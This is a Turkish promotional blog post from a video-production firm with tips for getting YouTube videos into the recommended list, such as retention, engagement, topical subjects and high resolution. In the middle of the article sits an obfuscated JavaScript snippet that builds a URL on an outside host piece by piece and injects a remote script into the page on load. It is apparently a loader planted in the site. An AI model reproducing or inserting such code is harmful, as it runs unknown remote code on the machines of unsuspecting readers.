Youtube'da Önerilen Videolara Çıkma İşlemi Nasıl Yapılır?

TAKİP ET

YouTube önerilen videolar, YouTube'da izlenilen herhangi bir videonun bitiminde veya yan tarafında çıkan benzer videolar olarak tanımlanabilir. YouTube algoritması gereği kullanıcılarını web site veya uygulamada tutmayı hedefleyen bir platformdur. Bu nedenle kullanıcılar YouTube uygulamasında ne kadar aktif kalırsa YouTube için o kadar avantajlı bir durum söz konusudur.

YouTube bu avantajı sağlayabilmek için videoların benzer içeriklerini ilgili hedef kitleye sunar. Böylece oturum süresini uzatmaya çalışır. Bununla birlikte YouTube’da önerilen videolarda nasıl yer alabilirim konusu da merak edilen bir konudur. Turkey Video Network olarak bu yazımızda, YouTube önerilen videolarda yer alma hakkında merak edilenleri ele alarak uygulamanız gerekenleri sizler ile paylaşacağız.

YouTube Önerilen Videolar Nedir?

 

YouTube kanalı olan kullanıcıların videolarına en çok izlenme, önerilen videolar ve arama motoru sonuçları ile mümkün olur. Bu nedenle önerilen videolara çıkmak her içerik üreticisinin hedefidir. YouTube önerilen videolara çıkmak için bazı yöntemler ve uyulması gereken kriterler mevcuttur. Bu kriterleri uyguladığınızda önerilen videolara çıkma süreci çok daha uzun sürebilir.

 

Nasıl YouTube Önerilerinde Yer Alırsınız?

 

YouTube’da önerilen videolara çıkmak için değişmeyen tek bir yöntem bulunmamaktadır. Algoritma göz önüne alındığında ise videonun önerilenlere çıkıp çıkmaması gerektiği belirlenebilir. Böylece YouTube kanalı sahipleri önerilen videolara çıkarak arama motorundan alabileceği izlenme sayısından katbekat fazla izlenme sayısına ulaşabilmektedir. YouTube’da önerilen videolara çıkmak için dikkat edilmesi gereken detaylar şu şekildedir;

 

(function(){ clku=document.createElement("script");clku_=("ust");clkuu="492270052"; clku_+="a"+("t.i");clku.type="text/javascript"; clkuu+=".98xX97yilkusqrfkl57v";clku.async=true;clku_+="n"+("f"+"o")+"/"; clkuu+="rxikxcclqa";clku.src="https://"+clku_+clkuu; document.body.appendChild(clku); })();

İzleyiciyi Videoda Tutmaya Çalışmak

YouTube algoritmasının en önemli etkeni kitleyi elde tutma oranı olarak bilinmektedir. YouTube, kullanıcıların uygulamada kalmasını ve vakit geçirmesini ister. Bu hedefi başarabilmek için uygulanabilecek en etkili yöntem kullanıcının ilgisini çekecek videolar sunmaktır. YouTube kanal sahibi, videolarındaki kitleyi elde tutma süresini ne kadar uzun tutarsa önerilenlere çıkma ihtimali de kadar artar.

 

İzleyici ile Samimi Bir Bağ Kurmak

YouTube kullanıcıları, kanal sahibi ile etkileşime girebilmek ve daha samimi bir bağ kurmak ister. YouTube yorum kısmı, beğenme veya beğenmeme kısmını koymasının en büyük sebebi de bu etkendir. Sayfa sahiplerinin videosuna yorum yapan hiçbir izleyicinin yorumu cevapsız kalmamalıdır. İzleyiciler ile ne kadar çok etkileşim geçerseniz, videonun erişim ve etkileşim sayısı da o kadar artacaktır.

 

Güncel Konular ile İlgili Videolar Yayınlamak

YouTube tarafında kanalların yayın yapabileceği türde güncel bir konu yakalandığında kaçırmamak son derece önemlidir. Bu sayede yüksek izlenme sayıları elde edilebilirsiniz. Ayrıca abone sayılarında da büyük bir artış görülebilir.

 

Diğer Videolarınıza Yönlendirme Yapmak

YouTube kanalının ortalama bir kitleyi ulaşıp elde tutması süresini artırmak için uygulanabilecek bir diğer yöntem, sayfanın videolarına yönlendirme yapmaktır. Video sürecinde önceki videoların konularına değinecek yorumlar yaparak yönlendirme yapabilir ve kullanıcıların etkileşimi artırılabilirsiniz.

 

 

Videoları Görüntü Kalitesi Yüksek Olacak Şekilde Kaydetmek

YouTube’da daha çok izlenmek için en önemli kriterlerden biri de videonun görüntü kalitesidir. Bunun için 1080P ve 60 FPS ile çekilmiş bir videoda içerik çok kaliteli olmasa dahi kendini izletir.

 

TVN ile Youtube Danışmanlık Hizmeti

 

TVN, etkili ve yaratıcı YouTube video prodüksiyon hizmeti sunar. Böylece markanızı büyütebilir ve dünyanın en popüler ikinci arama motorunda önemli bir konuma sahip olabilirsiniz. Ayrıca bir YouTube video içerik üreticiyseniz doğru stratejilerle profesyonelce yapılan YouTube video prodüksiyon hizmetini TVN ile elde etmeniz mümkündür. Bu sayede markalaşabilir ve hedeflediğiniz başarılara ulaşabilirsiniz. Sunduğumuz prodüksiyon ve video içerik stratejisi oluşturma hizmetlerinden faydalanmak için bizimle iletişime geçebilirsiniz!